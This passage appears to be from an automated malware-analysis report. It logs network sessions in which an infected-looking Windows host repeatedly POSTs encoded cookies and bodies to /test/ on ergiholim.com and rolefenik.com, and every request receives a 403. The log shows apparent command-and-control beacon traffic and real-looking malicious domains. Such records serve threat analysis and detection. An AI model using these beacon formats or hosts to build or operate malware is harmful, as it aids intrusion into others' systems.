                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=134927&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=21447&cwnd=32&unsent_bytes=0&cid=286837213be96280&ts=968&x=0"
                                                                                                                                          2024-11-13 17:23:27 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          74 | 192.168.2.6 | 50069 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:27 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:27 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:28 UTC | 754 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:28 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yQGNoPJj4b6FfOmS%2BYwm1LNKHnm6JlviO4g3wRHlASmckX7NPt%2FA%2BVt4QjfeL24KVZbzwsRU8N4%2BgzwqR9DUIyYhdc%2BoetczZuqiNtLbdg%2FAHEC68rQDWjlY4ktlHmZc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20732468f9d78b-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21075&cwnd=32&unsent_bytes=0&cid=73ddc33a4c9826a8&ts=553&x=0"
                                                                                                                                          2024-11-13 17:23:28 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          75 | 192.168.2.6 | 50070 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:29 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:29 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:29 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:29 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h492SEKam0kHZsn9UuyKimtDKEKIP36gJCpHdbdJxynH2DJf%2FGr%2BU7bbaqEayy%2Fs44XC4jEDRVPHYp6%2FpCN3Y4WZMzQbBWhQ%2FVo9O1wkmSmFgYbeUdYX7npLSQ3xJBeW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20732dcc24f675-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=138745&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18395&cwnd=32&unsent_bytes=0&cid=28bb09f686d417be&ts=553&x=0"
                                                                                                                                          2024-11-13 17:23:29 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          76 | 192.168.2.6 | 50071 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:30 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:30 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:31 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:31 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UgOy7b8h9ZPo%2BOPQ9nXPf2tUt8QWHOYqWaHtpM2DervZ9RJNJLPG43P07W1FB7n683mGTThlhTjYOHHs%2BHGyDuhpp6c%2B4xr74XXiKOL1NaAXJbaKfaJKBf2jx6SpCLGL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207336ffe1d74b-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=131061&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22098&cwnd=32&unsent_bytes=0&cid=4501c5613c3f94c9&ts=615&x=0"
                                                                                                                                          2024-11-13 17:23:31 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          77 | 192.168.2.6 | 50072 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:32 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:32 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:32 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:32 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WCZI4zr%2FOT5u9EnGAYUPHs%2BuvBjmDNi0bwxRw2WS8t0i37k04eRVN%2FLwKWX8VMOEJm2E8C8X%2FAU%2BtwvrFxlHtvruMZbP4frLcp5JZUjoAvNTPH8KJQVvsZmq4Iwl162"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20733fbb226bc8-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=981&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2861660&cwnd=235&unsent_bytes=0&cid=7f679857cbd07a7a&ts=417&x=0"
                                                                                                                                          2024-11-13 17:23:32 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          78 | 192.168.2.6 | 50074 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:33 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:33 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:34 UTC | 744 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:34 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=whIsG8DA0uyqXXPGqgI0f6E9Knl38Mk9pax1SjHnVCAGboHXedOX227srRQY2iGR3rm9rMu1hGagWeWOvtkSBAwGBLsZFcV6lW915U%2FbYC7bWJQg7fxg9HcUKUj98Zgp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073484b78e3a5-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=138035&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=19439&cwnd=32&unsent_bytes=0&cid=f4bd36db14e8d446&ts=831&x=0"
                                                                                                                                          2024-11-13 17:23:34 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          79 | 192.168.2.6 | 50076 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:35 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:35 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:36 UTC | 754 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:36 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBEY6aFdYysGtc1lexUwe2czszcmxSm1%2FTP7s%2FBLYIm%2BWT5qEqrzNtoxowUTerLdEM%2FB5wv9uohz2%2Bv5UNh6xWtEcj1vOCpQWlwD5FApM2n%2F0owmU2rU1JPe7rcGbtcE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207356af3fd759-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=136593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22040&cwnd=32&unsent_bytes=0&cid=9e4a5e3dffdcdc74&ts=878&x=0"
                                                                                                                                          2024-11-13 17:23:36 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          80 | 192.168.2.6 | 50077 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:37 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:37 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:37 UTC | 751 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:37 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fk2HRn2bSb%2BRwUO026S3Ca6xUM8Br8CcFECYvSAidACVK8OoHHGPSQGlefY7cacTaDlUHG%2F50YfW2Ti19WsohTGJYG5KEXvxGN%2BRt4dGIDCC%2BwPpJVOmKDCYAKrn9q14"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20735fbb56a918-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2228&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=1294590&cwnd=177&unsent_bytes=0&cid=38110786e51e7e48&ts=397&x=0"
                                                                                                                                          2024-11-13 17:23:37 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          81 | 192.168.2.6 | 50078 | 104.21.15.162 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:38 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:38 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:39 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:39 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fqHhDDa9vWu2f6ggicUok6Ays%2BQpWh0csmu8pwtkKHF70LwAp9GKoBjEThnFbUpkXpTPnJjQSbX8ub1SsYVxrvoiGx6JrUbYX5qJUobe3ra9ST39Sqo%2BwFL2WAoHhS%2BN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073689b8bd743-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=134490&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22078&cwnd=32&unsent_bytes=0&cid=58b9efb659a76c0e&ts=603&x=0"
                                                                                                                                          2024-11-13 17:23:39 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                          82    192.168.2.6    50079    104.21.92.105    443
                                                                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                                                                          2024-11-13 17:23:40 UTC    415    OUT    POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:40 UTC    92    OUT    Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:40 UTC    753    IN    HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:40 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2BM2cNwwzt3Olr2SsX%2Br4bdl8Z1yxN%2FvFE%2FJuOoz04mQIKvdI9HOcWzZ7pfNk7tRvajTqlxWR%2BWaZKxDlBD9iSZeSjuGA3m3vbQLKzRQJVd0C47ab2ls1RaOoyvjT%2Beg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073709a56ce68-SJC
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=69520&cwnd=32&unsent_bytes=0&cid=9a1a4e3ed90fbf59&ts=549&x=0"
                                                                                                                                          2024-11-13 17:23:40 UTC    555    IN    Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:40 UTC    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                          83    192.168.2.6    50080    104.21.15.162    443
                                                                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                                                                          2024-11-13 17:23:41 UTC    415    OUT    POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:41 UTC    92    OUT    Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:42 UTC    752    IN    HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:42 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HT%2FWTzb%2BFOnNfpD53mNEyzH2Uj2zL43XDudcNIF019IfZz3KUKD6RMI%2BIBtcCoSSRrxSADQUm%2FdcRO05SJeR8s4mtIZyoSq2uy%2FdSWXDOP3bb1lr5zqDUyvhBEHgXx2a"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207379dbf7687f-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=151871&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=20624&cwnd=32&unsent_bytes=0&cid=610d245fe586dbef&ts=798&x=0"
                                                                                                                                          2024-11-13 17:23:42 UTC    555    IN    Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
